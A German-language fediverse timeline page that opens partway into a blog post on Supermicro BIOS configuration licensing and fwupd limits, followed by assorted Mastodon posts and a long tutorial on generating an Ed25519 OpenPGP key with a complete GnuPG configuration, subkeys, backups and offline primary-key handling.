                                                              Heraus kommt eine Datei von 260 Kilobyte mit 60 Menüs und 372 Einstellungen. Zum Vergleich: das offizielle Handbuch beschreibt 180 Optionen. Und die Datei enthält pro Eintrag mehr, als man im Setup sieht, nämlich zusätzlich den Auslieferungszustand und den Hilfetext:

                                                              <Setting name="Quiet Boot" checkedStatus="Unchecked" type="CheckBox">
                                                                <Information>
                                                                  <DefaultStatus>Checked</DefaultStatus>
                                                                  <Help>Enables or disables Quiet Boot option</Help>
                                                                </Information>
                                                              </Setting>

                                                              Der Auslieferungszustand ist der eigentliche Gewinn. Damit sehe ich auf einen Blick, welche Einstellungen an dieser Maschine vom Werkszustand abweichen, und das ist genau die Liste, die man nach einem BIOS-Update wiederherstellen will.

                                                              Zwei komplette Hauptmenüs standen darin, die ich beim Durchklicken schlicht nie geöffnet hatte. Und ein Untermenü, das ich in meinen Notizen als offene Lücke geführt habe, war vollständig enthalten. So viel zum Thema Handarbeit übersieht Dinge.

                                                              Was die Lizenz nicht freischaltet

                                                              Jetzt der ehrliche Teil, und der ist mir wichtiger als der Erfolg. Ich hatte vor dem Kauf drei Messungen aufgeschrieben, damit ich hinterher vergleichen kann. Drei von vier Erwartungen sind eingetroffen, und die vierte war die interessante.

                                                              Der Redfish-Endpunkt, mit dem alles anfing, antwortet weiterhin mit 403 und verlangt weiterhin DCMS. Die kleine Lizenz öffnet den Weg über SAA und eben nicht den über Redfish. Wer also ausdrücklich die Netzwerkschnittstelle braucht, etwa weil er hunderte Server ohne Betriebssystem konfigurieren will, kommt um die große Lizenz nicht herum.

                                                              Das hat eine Nebenwirkung, die ich nicht auf dem Zettel hatte. Der Firmware-Updater fwupd kann inzwischen mit Supermicros Redfish-Schnittstelle sprechen. Er sieht bei mir aber nur zwei von zwölf Firmware-Komponenten, und die beiden BIOS-Einträge fehlen. Der Grund ist, dass er zur Identifikation eines Geräts das Objekt lesen muss, das hinter genau diesem gesperrten Endpunkt liegt. Die Lizenz sperrt hier also nicht das Aktualisieren, sondern das Erkennen, und das Aktualisieren scheitert dann als Folge. Nach der Aktivierung sind es unverändert zwei von zwölf.

                                                              Und der dritte Weg, den ich vorher gar nicht gesehen hatte: fwupd sieht den BIOS-Speicher auch ganz direkt am Chipsatz, liest die Version korrekt aus und verweigert trotzdem den Dienst:

                                                              Internal SPI Controller (BIOS):
                                                                  Aktuelle Version: 2.5
                                                                  Probleme:         Device firmware has been locked

                                                              Das ist keine Lizenzsache, und daran hat sich erwartungsgemäß nichts geändert. Der Speicher ist auf Chipsatzebene schreibgeschützt, weil das Board mit aktivem Root of Trust läuft. Ein BIOS, das sich aus einem laufenden Betriebssystem heraus überschreiben lässt, wäre genau die Lücke, die dieser Schutz verhindern soll. Der Reflex sagt hier Hersteller blockiert Linux. Tatsächlich blockiert eine Sicherheitsfunktion, die ich selbst haben will.

                                                              Mein Denkfehler

                                                              Bleibt der Satz, den ich weiter oben angekündigt habe. In meinen Notizen stand nach der dritten Absage sinngemäß: drei unabhängige Wege, dieselbe Sperre, nicht erneut versuchen.

                                                              Gemessen hatte ich: ohne Lizenz gibt es keinen Weg. Aufgeschrieben hatte ich: es gibt keinen Weg. Und die dritte Möglichkeit, nämlich die Lizenz einfach zu kaufen, kam in meiner Aufzählung der drei gesperrten Wege überhaupt nicht vor, obwohl das Werkzeug sie mir wörtlich genannt hatte.

                                                              Dass drei Wege an derselben Sperre scheitern, beweist, dass es eine Sperre gibt. Es beweist nicht, dass sie unüberwindbar ist. Wenn eine Fehlermeldung den Namen der fehlenden Berechtigung nennt, ist das ein Hinweis und kein Schlusspunkt.

                                                              Lohnt sich das?

                                                              Für einen einzelnen Rechner zu Hause: nur, wenn man Freude daran hat. Ich hätte die Werte auch weiter abschreiben können, und der Screencast hat mir immerhin eine fünfzehnteilige Serie eingebracht, die aus einer XML-Datei nie entstanden wäre. Man liest eine Datei nicht so aufmerksam wie ein Menü, durch das man sich selbst klicken muss.

                                                              Für alles, was mehr als eine Handvoll Maschinen betrifft, sieht es anders aus. Konfiguration auslesen, versionieren, nach einem Update wieder einspielen und im Zweifel gegen einen bekannten Stand vergleichen, das ist bei 28 Euro pro Board keine Diskussion. Ärgerlich finde ich nur, dass man diese Rechnung überhaupt aufmachen muss. Es geht um das Auslesen der eigenen Einstellungen auf der eigenen Hardware.

                                                              Wenn du auf demselben Board sitzt und dieselbe Fehlermeldung vor dir hast, ist die Kurzfassung: für die Konfiguration reicht die kleine Lizenz, für Redfish brauchst du die große, und für Firmware-Updates brauchst du bei einem X12 mit Root of Trust vermutlich gar keine.

                                                              Siehe auch: BIOS erklärt, Teil 1: ein Serverboard als Workstation und der Weg ins Setup und die übrigen Folgen unter BIOS & Firmware.

                                                              Wenn dazu etwas unklar ist oder du es auf deinem Board anders erlebt hast, dürft ihr mich sehr gerne fragen.

                                                              [?]Graham Perrin » 🌐
                                                              @grahamperrin@mastodon.bsd.cafe

                                                              SMB Is Mandatory Now: What macOS Dropping the AFP Client Means for Storage Engineers ― Mitaka Digital | DEV Community

                                                              dev.to/mitakadigital/smb-is-ma

                                                              "For four decades, the Apple Filing Protocol quietly underwrote every "just works" file-sharing experience in the Apple ecosystem. That era has ended. Apple deprecated the AFP client in macOS Sequoia 15.5, carried a removal warning through macOS 26 Tahoe, and shipped the macOS 27 "Golden Gate" developer beta with no AFP client at all. If your storage estate still serves Mac clients over afp://, the compatibility gap is live today, not on a future roadmap. …"

                                                                AodeRelay boosted

                                                                [?]VibeOps » 🌐
                                                                @vibeops@techhub.social

                                                                Mein Sohn hat auf seinem Handy immer mehr wichtige Bilder... Google Fotos speicher Läuft über...

                                                                Zeit für Hab bereits seit Monaten bei mir alles umgestellt... Nun Multi User Platform 😁

                                                                Früher: Googlen wie das geht - über web Interface Durchquälerei - Frust vorprogrammiert

                                                                Heute: eine Nachricht an mein KI Agent - der macht alles über immich API - Sendet mir ne txt mit allen nötigen Infos - Sohn richtet es ein - 5 Minuten läuft sein Backup

                                                                Und ich "weiß" wie das umgesetzt ist:

                                                                Technische Umsetzung der Trennung:

                                                                Immich isoliert jeden Benutzer sowohl in der Datenbank als auch im Dateisystem komplett:

                                                                - Dateisystem: Jeder User bekommt ein eigenes Verzeichnis nach seiner UUID. Jakobs Daten liegen unter `/mnt/immich-data/upload/upload/a5a86a77-.../`, deine unter `/mnt/immich-data/upload/upload/6f5b4988-.../`. Das gilt für alle drei Storage-Typen: Original-Uploads, Thumbnails und encoded Videos. Keine Überschneidung möglich.

                                                                - Datenbank: Jeder Asset-Eintrag hat einen `ownerId` Foreign Key auf den User. Immich filtert bei jeder Abfrage nach dem eingeloggten User — Jakob sieht nur seine eigenen Fotos, du nur deine.

                                                                - Backup: Das Borg-Backup sichert `/mnt/immich-data` komplett, also beide User-Bereiche.

                                                                Aktuelle Verteilung:
                                                                - Lars: 33.364 Assets, ~254 GB
                                                                - Jakob: 8 Assets, ~1,7 GB
                                                                - Disk: 332 GB von 697 GB belegt (48%)

                                                                Alles sauber getrennt. Jakob hat seinen eigenen Bereich, kann deine Fotos nicht sehen und umgekehrt. Falls du später teilen wollt, kann Immich das über **Shared Albums** — aber das müsstet ihr aktiv anlegen.

                                                                  Alexandre :freebsd: boosted

                                                                  [?]Stefano Marinelli » 🌐
                                                                  @stefano@mastodon.bsd.cafe

                                                                  With Apple phasing out AFP in macOS 27 and Time Capsules officially reaching end-of-life, it's time to move network backups to proper SMB.

                                                                  If you run a FreeBSD server, you can build a fast, rock-solid, and secure Time Machine target powered by ZFS and Samba - neatly isolated inside a FreeBSD jail using Bastille.

                                                                  it-notes.dragas.net/2026/01/28

                                                                  Keep your macOS backups running smoothly via SMBv3 (with full vfs_fruit support) and full dataset quota control on ZFS!

                                                                    Alexandre :freebsd: boosted

                                                                    [?]Stefano Marinelli » 🌐
                                                                    @stefano@mastodon.bsd.cafe

                                                                    With Apple phasing out AFP in macOS 27 and Time Capsules officially reaching end-of-life, it's time to move network backups to proper SMB.

                                                                    If you run a FreeBSD server, you can build a fast, rock-solid, and secure Time Machine target powered by ZFS and Samba - neatly isolated inside a FreeBSD jail using Bastille.

                                                                    it-notes.dragas.net/2026/01/28

                                                                    Keep your macOS backups running smoothly via SMBv3 (with full vfs_fruit support) and full dataset quota control on ZFS!

                                                                      AodeRelay boosted

                                                                      [?]VibeOps » 🌐
                                                                      @vibeops@techhub.social

                                                                      Bin seit 3 Jahren Vorstand vom Förderverein Grundschule Betzenberg eV :P

                                                                      Wir organisieren immer kleinere Aktionen in der Schule - wiederkehrende Abläufe

                                                                      4 Personen im Vorstand (Kassenwart + Schriftführer)

                                                                      IT-Situation:
                                                                      - Homepage bei Schulträger mit gehostet (Wordpress 🐌 )
                                                                      - Jeder hat sein Daten bei sich liegen

                                                                      Ich hab Kudelmudel an Daten wo ich nie die richtige Datei finde

                                                                      Viel Reibung in den Abläufen - unstrukturierte Arbeitsweisen(letztes Protkoll von Sitzung liegt in WhatsApp)

                                                                      Hand hoch wer es kennt ✋

                                                                      Jetzt im Urlaub und am Vorbereiten der Einschulungsfeier - mit zu viel am ende der Woche - ist es passiert...

                                                                      Ich hab das was ich die letzten Monate auf Arbeit gelernt habe auf mich selbst angewendet...

                                                                      Lets do vibeops in förderverein

                                                                      1. Schritt - ionos vps s gemietet
                                                                      2. Schritt - drauf installiert
                                                                      3. Schritt - zur party eingeladen
                                                                      4. Schritt - Homepage gebaut
                                                                      5. Schritt - mit / eine einfachen gemeinsamen Storage angelegt
                                                                      6. Schritt - hermes mit cronjobs zur selbstverwaltung eingestellt (update / watchdog)
                                                                      7. Schritt - aus meinem Datenmüll aus verschiedenen Dateien eine neue parallel Workflow basierte Ordnerstruktur aufgebaut (na klar mit hermes) - kann man auch noch als WebApp weiter spinnen

                                                                      fvgs-betzenberg.de/

                                                                      Ein bissel Fehler behoben und das Mitglied werden PDF interaktiv erstellen lassen

                                                                      Arbeitszeit 3h

                                                                      Wenn man das jetzt weiter spinnt können wir uns da jetzt unsere mitgliederdatenbank anlegen - vllt irgendwann die buchhaltung darüber laufen lassen

                                                                      Monatlich 1€ für VPS - 0,50€ für die URL

                                                                      jetzt müssen die anderen Vorstände sich das mal anschauen

                                                                      krass was mal wieder aus eine impuls passieren kann - früher irgendwie joomla augesetzt und dann die lust verloren - jetzt booooooom

                                                                        [?]Crazypedia won't Comply 🧿 [He/They] » 🌐
                                                                        @Crazypedia@mypocketpals.online

                                                                        Well, I guess I'm going to be suggesting to the company I work for as a new(first) sandbox detonation option.

                                                                        Anyone have any experience or insights they'd like to give me before I make a pitch?

                                                                          AodeRelay boosted

                                                                          [?]BlablaLinux » 🌐
                                                                          @blablalinux@mastodon.blablalinux.be

                                                                          🔹 Plus de choix matériel : Idéal pour diversifier vos serveurs ou tester de nouvelles architectures.

                                                                          Une excellente nouvelle pour réduire la consommation d'énergie sans sacrifier les fonctionnalités !

                                                                          📖 Pour lire le communiqué officiel complet : proxmox.com/en/about/company-d

                                                                            [?]skotperez » 🌐
                                                                            @skotperez@voragine.net

                                                                            Bash For Loop Array: Iterate Through Array Values

                                                                            [?]`Da Elf » 🌐
                                                                            @elfin@mstdn.social

                                                                            Did I NOT just do kernel updates Friday?

                                                                            Yes, yes I did.

                                                                            Do I think I can get away with updating and rebooting without anyone noticing?

                                                                            Yes, yes I do.

                                                                              AodeRelay boosted

                                                                              [?]-=Kernel-Error=- » 🌐
                                                                              @kernel-error.de@www.kernel-error.de

                                                                              Einen modernen OpenPGP-Schlüssel bauen: Ed25519, drei Unterschlüssel und die Härtung, die ihn geschwächt hat

                                                                              Ein Schlüssel kann modern sein und trotzdem falsch konfiguriert. Teil A ist das Rezept: Ed25519, zertifizierender Hauptschlüssel, drei Unterschlüssel, gpg.conf, vier Exportformate, sieben Kanäle. Teil B erklärt, warum eine einzige Härtungszeile mir AES-128 statt AES-256 eingebrockt hat. [SENSITIVE CONTENT]

                                                                              Moin. Im letzten Beitrag ging es darum, wie ich meinen OpenPGP-Schlüssel an Domain, GitHub und Matrix gebunden habe, also um die Frage, woher eigentlich irgendwer wissen soll, dass dieser Schlüssel mir gehört. Ganz am Ende stand dort die Ankündigung eines zweiten Teils: wie das Ding überhaupt gebaut ist und wie sicher es wirklich ist. Der Teil ist jetzt hier.

                                                                              Der Beitrag hat zwei Hälften, und die kannst du unabhängig voneinander lesen. Teil A ist ein Rezept. Wenn du einen Schlüssel nach demselben Muster bauen willst, arbeitest du dich von oben nach unten durch, inklusive der kompletten GnuPG-Konfiguration, alles kopierbar und in der richtigen Reihenfolge. Teil B erklärt, was die einzelnen Bauteile bedeuten, und endet mit einer ehrlichen Einschätzung, wie sicher das alles am Ende ist.

                                                                              Der eigentliche Grund, warum ich das aufschreibe, ist aber ein anderer. Zwischen „mein Schlüssel ist modern“ und „mein Schlüssel ist richtig konfiguriert“ liegt eine Lücke, und in die bin ich mit Anlauf hineingesprungen. Der Schlüssel ist Lehrbuch: Ed25519, ein Hauptschlüssel, der ausschließlich zertifiziert, drei getrennte Unterschlüssel, fünf Jahre Laufzeit, über sieben Kanäle veröffentlicht, dazu eine eID-Zertifizierung. Und trotzdem wurde er vom ersten Tag an schwächer angesprochen als der Schlüssel, den er ablöst.

                                                                              Aufgefallen wäre das niemandem, und genau das ist der interessante Teil. Das einzige Symptom war eine Warnzeile auf dem Terminal von jemandem, der mir eine verschlüsselte Mail schreibt. Also auf einem Rechner, den ich nie zu Gesicht bekomme. Und die Ursache war ausgerechnet eine Härtungsmaßnahme, die ich in bester Absicht eingebaut hatte, um einen musealen Algorithmus loszuwerden. Härtung, die etwas leise verschlechtert, finde ich als Geschichte deutlich spannender als noch eine Schlüsselerzeugungsanleitung. Nachbauen kannst du das übrigens in zwei Minuten, das Labor dazu steht weiter unten.

                                                                              Der Schlüssel, um den es geht

                                                                              Bestandteil

                                                                              Wert

                                                                              Hauptschlüssel

                                                                              ed25519 0x893DE0CDDE986DEB, Verwendung [C], also nur zertifizieren

                                                                              Fingerabdruck

                                                                              45FC D081 ADB5 4872 EA5B 06B9 893D E0CD DE98 6DEB

                                                                              Signatur-Unterschlüssel

                                                                              ed25519 0xD788641D8588A674

                                                                              Verschlüsselungs-Unterschlüssel

                                                                              cv25519 0x429D03637892821A

                                                                              Authentisierungs-Unterschlüssel

                                                                              ed25519 0x22F2E3234664DDBE

                                                                              UIDs

                                                                              Sebastian van de Meer, dazu eine Foto-UID mit 10851 Byte

                                                                              Gültigkeit

                                                                              erzeugt am 24.07.2026, läuft am 23.07.2031 ab

                                                                              Vorgänger

                                                                              ed25519 0x5F279C362EEAB216, gültig bis 31.12.2026, zeichnet den neuen gegen

                                                                              Fremdzertifizierung

                                                                              Governikus/eID 0x5E5CCCB4A4BF43D7, Level 3

                                                                              Umgebung

                                                                              GnuPG 2.4.4, libgcrypt 1.10.3

                                                                              Die Aufgabenteilung steht nicht nur in der Doku, die steht maschinenlesbar im Schlüssel selbst. Jede Bindungssignatur trägt ein Feld mit Schlüssel-Flags, und das sieht bei mir so aus:

                                                                              primary  key flags: 01   certify
                                                                              [S]      key flags: 02   sign
                                                                              [E]      key flags: 0C   encrypt communications + encrypt storage
                                                                              [A]      key flags: 20   authenticate

                                                                              Teil A: den Schlüssel bauen

                                                                              Teil A ist der Ablauf, den ich für richtig halte, und bis auf die markierten Stellen genau der, den ich gegangen bin. Dort, wo der Befehl unten besser ist als das, was ich damals getippt habe, steht ein Hinweis dazu.

                                                                              Voraussetzungen

                                                                              gpg --version
                                                                              # gpg (GnuPG) 2.4.4
                                                                              # libgcrypt 1.10.3

                                                                              GnuPG 2.4.x ist die Annahme für den ganzen Beitrag. Zwei Dinge gleich vorweg, weil sie sonst später wehtun:

                                                                              • --quick-generate-key verweigert den Dienst, wenn die UID bereits auf einem anderen Schlüssel im Schlüsselbund existiert. Genau deshalb ist dieser Schlüssel über eine Parameterdatei mit --batch --gen-key entstanden. Das trifft dich zuverlässig genau dann, wenn du einen Schlüssel rotierst, also in dem Moment, in dem der alte noch da ist.
                                                                              • Nichts hier braucht eine Smartcard, und nichts hier braucht root.

                                                                              Wenn du bei GPG ganz am Anfang stehst, sind die Grundlagen zum Signieren und Verschlüsseln hier im Blog der bessere Einstieg. Dieser Beitrag setzt voraus, dass du weißt, was ein öffentlicher Schlüssel und ein Unterschlüssel sind.

                                                                              Erst aufräumen, dann anfangen

                                                                              Und zwar wirklich vorher, nicht hinterher. Mein ~/.gnupg war in einem Zustand, den ich hier nur ungern zugebe.

                                                                              chmod 700 ~/.gnupg
                                                                              find ~/.gnupg -type f -exec chmod 600 {} +
                                                                              
                                                                              # Erst alle GnuPG-Frontends schließen und die Daemons beenden, sonst löschst du
                                                                              # unter Umständen echte, aktive Locks:
                                                                              gpgconf --kill all
                                                                              
                                                                              # Übriggebliebene Lock-Dateien abgestürzter Läufe. Bei mir waren es 93 Stück.
                                                                              find ~/.gnupg -name '.#lk*' -delete
                                                                              
                                                                              # Altlasten, die keine 2.4er Installation mehr braucht
                                                                              mkdir -p ~/gnupg-attic-$(date +%F)
                                                                              mv ~/.gnupg/{cert8.db,key3.db,secmod.db} ~/gnupg-attic-$(date +%F)/ 2>/dev/null

                                                                              Ein ~/.gnupg mit 775 und Dateien mit 664 ist erschreckend verbreitet, und ich will das gar nicht größer machen als es ist: Auf einem Einzelplatzrechner ist das keine Katastrophe. Es wird aber genau in dem Moment eine, in dem das Home-Verzeichnis in ein Backup, in einen Container-Mount oder in einen synchronisierten Ordner wandert. Und das passiert schneller, als man denkt.

                                                                              Die gpg.conf, komplett

                                                                              Das ist die tatsächlich laufende Konfiguration, so wie sie bei mir liegt, mit ihren Originalkommentaren. Der Block mit dem Warnhinweis ist die wichtigste Stelle im gesamten Beitrag, warum, steht in Teil B.

                                                                              # ---- UX / output ----
                                                                              keyid-format 0xlong
                                                                              with-fingerprint
                                                                              with-subkey-fingerprint
                                                                              utf8-strings
                                                                              
                                                                              # ---- Key discovery (local first, then WKD/DANE; email-validated keyserver last) ----
                                                                              auto-key-retrieve
                                                                              auto-key-locate local,wkd,dane,keyserver
                                                                              keyserver hkps://keys.openpgp.org
                                                                              
                                                                              # ---- Strong defaults ----
                                                                              # cipher-algo / digest-algo are intentionally NOT forced: forcing them would override
                                                                              # the recipient's stated capabilities. personal-*-preferences below select strong
                                                                              # algorithms interoperably instead.
                                                                              cert-digest-algo SHA512
                                                                              
                                                                              # ---- KDF hardening for passphrase-derived symmetric keys (gpg -c / key export) ----
                                                                              s2k-mode 3
                                                                              s2k-digest-algo SHA512
                                                                              s2k-cipher-algo AES256
                                                                              s2k-count 65011712
                                                                              
                                                                              # ---- WARNING. Legacy ciphers: do NOT disable 3DES here ----
                                                                              # An earlier version of this file carried:
                                                                              #     disable-cipher-algo 3DES
                                                                              #     disable-cipher-algo IDEA
                                                                              #     disable-cipher-algo CAST5
                                                                              #     disable-cipher-algo BLOWFISH
                                                                              #     disable-cipher-algo TWOFISH
                                                                              # The 3DES line alone silently strips ALL algorithm preferences from every key you
                                                                              # generate while it is active, and it also blocks DECRYPTION of old archives.
                                                                              # New encryption never selects a legacy cipher anyway, because
                                                                              # personal-cipher-preferences lists AES only.
                                                                              
                                                                              # ---- Privacy / minimal metadata ----
                                                                              no-comments
                                                                              no-emit-version
                                                                              export-options export-minimal
                                                                              
                                                                              # ---- Listing/verification quality-of-life ----
                                                                              verify-options show-uid-validity
                                                                              list-options show-uid-validity
                                                                              
                                                                              # ---- Trust model ----
                                                                              trust-model tofu+pgp
                                                                              
                                                                              # ---- Your key ----
                                                                              default-key 0x45FCD081ADB54872EA5B06B9893DE0CDDE986DEB
                                                                              # hidden-encrypt-to 0x45FCD081ADB54872EA5B06B9893DE0CDDE986DEB   # optional, off
                                                                              
                                                                              # ---- Local policy: what *you* prefer when sending ----
                                                                              personal-cipher-preferences AES256 AES192 AES
                                                                              personal-digest-preferences SHA512 SHA384 SHA256
                                                                              weak-digest SHA1
                                                                              force-ocb
                                                                              
                                                                              # ---- Preferences baked into keys you create from here on ----
                                                                              default-preference-list SHA512 SHA384 SHA256 AES256 AES192 AES ZLIB BZIP2 ZIP Uncompressed

                                                                              Zwei Zeilen darin sind Entscheidungen und keine Selbstverständlichkeiten, deshalb je ein Satz dazu.

                                                                              • force-ocb ist keine Präferenz, sondern eine Erzwingung. Es sorgt dafür, dass ausgehende Nachrichten die OCB-Variante aus der LibrePGP-Linie benutzen, und setzt sich dabei über das hinweg, was der Empfängerschlüssel ankündigt. Sehr alte oder anders implementierte Empfänger können solche Nachrichten nicht lesen. Das steht in einer gewissen Spannung zu dem Prinzip ein paar Zeilen weiter oben, wo ich cipher-algo bewusst nicht erzwinge. Für mich ist das in Ordnung, in einer Konfiguration zum Abschreiben würde ich die Zeile weglassen.
                                                                              • auto-key-retrieve holt unbekannte Schlüssel beim Prüfen automatisch nach. Sehr bequem, und es verrät dem Keyserver, welche signierten Nachrichten du wann liest. Für mich ein akzeptabler Tausch, bei einem anderen Bedrohungsmodell schaltest du das besser ab.

                                                                              Dazu die beiden kleinen Geschwisterdateien. gpg-agent.conf:

                                                                              enable-ssh-support
                                                                              default-cache-ttl 180
                                                                              max-cache-ttl 600
                                                                              pinentry-program /usr/bin/pinentry-gnome3

                                                                              Und dirmngr.conf:

                                                                              honor-http-proxy
                                                                              disable-ldap

                                                                              Den Hauptschlüssel erzeugen

                                                                              Ein Hauptschlüssel, der nur zertifiziert, über eine Parameterdatei. Die Zeile Preferences: war in meinem echten Lauf nicht drin, nimm sie mit. Sie kostet nichts und fängt genau den Fehler ab, um den es in Teil B geht. Das ist keine Vermutung, ich habe es nachgemessen: Mit dieser Zeile bleiben die Präferenzen selbst dann im Schlüssel, wenn die defekte Konfiguration aktiv ist. Die eigentliche Kontrolle bleibt trotzdem der Paket-Dump gleich darunter, denn eine Parameterdatei ersetzt nie die Prüfung des fertigen Artefakts.

                                                                              cat > keyparams.txt <<'EOF'
                                                                              Key-Type: eddsa
                                                                              Key-Curve: Ed25519
                                                                              Key-Usage: cert
                                                                              Name-Real: Sebastian van de Meer
                                                                              Name-Email: kernel-error@kernel-error.com
                                                                              Expire-Date: 5y
                                                                              Preferences: AES256 AES192 AES SHA512 SHA384 SHA256 ZLIB BZIP2 ZIP Uncompressed
                                                                              %ask-passphrase
                                                                              %commit
                                                                              EOF
                                                                              
                                                                              gpg --batch --gen-key keyparams.txt
                                                                              shred -u keyparams.txt

                                                                              Und jetzt sofort nachsehen, ob die Präferenzen auch wirklich im Schlüssel gelandet sind. Genau diese Prüfung fehlte bei mir im Juli, und deshalb steht sie hier direkt hinter der Erzeugung und nicht irgendwo weiter unten.

                                                                              gpg --export kernel-error@kernel-error.com | gpg --list-packets | grep -E 'pref-|features'

                                                                              Du willst dort pref-sym-algos, pref-hash-algos, pref-zip-algos und ein features mit gesetztem Bit 0x01 sehen. Wenn dort nur eine features-Zeile steht und sonst nichts, dann hör hier auf und lies erst den Abschnitt über den Defekt in Teil B. Dann stimmt etwas mit deiner Konfiguration nicht, und der Schlüssel trägt den Fehler ab sofort dauerhaft mit sich herum.

                                                                              Zum shred oben noch ein Wort, weil es sonst falsche Sicherheit erzeugt: Es entfernt die sichtbare Arbeitsdatei, mehr nicht. Auf SSDs, auf ZFS, bei Snapshots und auf journalenden Dateisystemen ist damit überhaupt nicht garantiert, dass keine alten Blöcke mehr herumliegen. Solche Zwischendateien sollten deshalb von vornherein nur auf einem verschlüsselten Dateisystem entstehen.

                                                                              Die drei Unterschlüssel

                                                                              Interaktives --quick-add-key ist mir in einer nicht-interaktiven Shell mit einem /dev/tty-Fehler um die Ohren geflogen. Mit --batch läuft es durch.

                                                                              FPR=45FCD081ADB54872EA5B06B9893DE0CDDE986DEB
                                                                              gpg --batch --quick-add-key $FPR ed25519  sign 5y
                                                                              gpg --batch --quick-add-key $FPR cv25519  encr 5y
                                                                              gpg --batch --quick-add-key $FPR ed25519  auth 5y

                                                                              Die Foto-UID

                                                                              240×288 Pixel, Graustufen-JPEG, 10851 Byte. Halt das Bild klein, es reist in jedem vollständigen Export mit und ist der mit Abstand größte Posten in der Schlüsselgröße.

                                                                              gpg --edit-key $FPR
                                                                              > addphoto
                                                                              > /pfad/zu/sebastian-photo-uid.jpg
                                                                              > save

                                                                              Eine Sache dazu, die man vorher wissen sollte: Keiner der drei Keyserver, die ich benutze, hat die Foto-UID nach dem Upload je wieder herausgerückt. Für jeden Keyserver da draußen lege ich die Hand nicht ins Feuer, für die drei, auf die es ankommt, schon. Das Bild überlebt damit nur auf den Kanälen, die ich selbst hoste. Damit ist die Foto-UID Dekoration und keine Funktion. Das ist ein völlig legitimer Grund, sie trotzdem mitzunehmen, man sollte sich nur nichts vormachen.

                                                                              Backup und Widerrufszertifikat, bevor irgendetwas veröffentlicht wird

                                                                              Zwei Dinge müssen existieren, bevor der Schlüssel irgendwo landet: ein Backup des geheimen Schlüssels und ein Widerrufszertifikat. Beides später nachzuholen ist der Klassiker, den man genau einmal bereut.

                                                                              gpg --export-secret-keys --armor $FPR > secret-key-backup.asc
                                                                              gpg --output revoke.asc --gen-revoke $FPR

                                                                              Ein Widerrufszertifikat legt GnuPG bei der Erzeugung ohnehin schon selbst unter ~/.gnupg/openpgp-revocs.d/<FPR>.rev ab. Das Backup dagegen ist erst dann eines, wenn du es einmal zurückgespielt hast. Also rein damit in ein Wegwerf-GNUPGHOME und nachsehen, ob der geheime Hauptschlüssel dort auch wirklich auftaucht und nicht bloß die Datei lesbar war. Danach wandern beide auf Offline-Medien.

                                                                              RESTORE=$(mktemp -d); chmod 700 "$RESTORE"
                                                                              gpg --homedir "$RESTORE" --import secret-key-backup.asc
                                                                              gpg --homedir "$RESTORE" --with-subkey-fingerprint --list-secret-keys $FPR
                                                                              rm -rf "$RESTORE"

                                                                              Wichtig, weil es ein sehr verbreitetes Missverständnis ist: Der s2k-*-Block aus der gpg.conf betrifft den passphrasenbasierten Schutz, also etwa gpg -c und den Export. Er sagt nichts darüber aus, wie der geheime Schlüssel in ~/.gnupg auf der Platte geschützt ist. Darum kümmert sich der gpg-agent mit eigenen Parametern, und bereits vorhandenes Schlüsselmaterial wird durch eine geänderte gpg.conf nicht rückwirkend neu verpackt. Wer die beiden verwechselt, glaubt an eine Härtung, die an dieser Stelle gar nicht wirkt. Was tatsächlich in deinem Backup steht, siehst du wie immer am Artefakt selbst, per gpg --list-packets secret-key-backup.asc.

                                                                              Den Hauptschlüssel aus dem Alltag nehmen

                                                                              Jetzt kommt der Schritt, der die ganze Aufteilung von oben überhaupt erst einlöst. Der Hauptschlüssel hat im Alltag nichts verloren. Gebraucht wird er nur, wenn ein Unterschlüssel verlängert, ersetzt oder widerrufen wird, wenn eine UID dazukommt oder wenn du einen fremden Schlüssel zertifizierst. Also fliegt sein geheimer Teil vom Arbeitsrechner herunter, und zwar genau jetzt, nachdem Backup und Widerrufszertifikat existieren und nicht vorher.

                                                                              # nur die Unterschlüssel exportieren, ohne den geheimen Hauptschlüssel
                                                                              gpg --export-secret-subkeys --armor $FPR > subkeys.asc
                                                                              
                                                                              # das gesamte geheime Material aus dem Alltags-Keyring werfen
                                                                              gpg --delete-secret-keys $FPR
                                                                              
                                                                              # und danach ausschließlich die Unterschlüssel zurückholen
                                                                              gpg --import subkeys.asc
                                                                              shred -u subkeys.asc

                                                                              Kontrolliert wird das an einem einzigen Zeichen:

                                                                              gpg -K
                                                                              # sec#  ed25519/0x893DE0CDDE986DEB
                                                                              # ssb   ed25519/0xD788641D8588A674
                                                                              # ssb   cv25519/0x429D03637892821A
                                                                              # ssb   ed25519/0x22F2E3234664DDBE

                                                                              Das Doppelkreuz hinter sec ist der ganze Punkt. Es bedeutet: GnuPG kennt den Hauptschlüssel, hat sein geheimes Gegenstück aber nicht mehr. Signieren, Entschlüsseln und Authentisieren laufen unverändert weiter, dafür sind die Unterschlüssel zuständig. Was nicht mehr geht, ist alles, was die Identität selbst betrifft, also neue Unterschlüssel anlegen, Laufzeiten verlängern, UIDs ergänzen und fremde Schlüssel zertifizieren.

                                                                              Der geheime Hauptschlüssel liegt ab hier zusammen mit dem Widerrufszertifikat auf verschlüsseltem Wechselmedium. Wenn ich ihn brauche, kommt er ausdrücklich nicht zurück nach ~/.gnupg, sondern in ein temporäres GNUPGHOME, das hinterher wieder verschwindet.

                                                                              Ein Detail dabei ist wichtig genug für einen eigenen Absatz, weil es sonst still danebengeht: Das Offline-Backup ist ein Schnappschuss. Es entstand oben, bevor der alte Schlüssel gegengezeichnet hat und bevor die Governikus-Zertifizierung da war. Diese Fremdsignaturen hängen am öffentlichen Teil, der im Alltags-Keyring liegt, nicht im Backup. Wer nur das Backup einspielt und dort arbeitet, exportiert hinterher einen Schlüssel, dem genau diese Signaturen fehlen. Also immer beides einspielen:

                                                                              # aktuellen öffentlichen Stand samt Fremdsignaturen aus dem Alltags-Keyring mitnehmen
                                                                              gpg --armor --export-options no-export-minimal --export $FPR > /tmp/pub-aktuell.asc
                                                                              
                                                                              export GNUPGHOME=$(mktemp -d); chmod 700 "$GNUPGHOME"
                                                                              trap 'rm -rf "$GNUPGHOME"' EXIT HUP INT TERM   # auch bei Abbruch aufräumen
                                                                              gpg --import /media/offline/secret-key-backup.asc
                                                                              gpg --import /tmp/pub-aktuell.asc
                                                                              
                                                                              # hier die Arbeit am Schlüssel, etwa eine Laufzeit verlängern
                                                                              
                                                                              gpg --armor --export-options no-export-minimal --export $FPR > /tmp/pub-neu.asc
                                                                              rm -rf "$GNUPGHOME"; unset GNUPGHOME

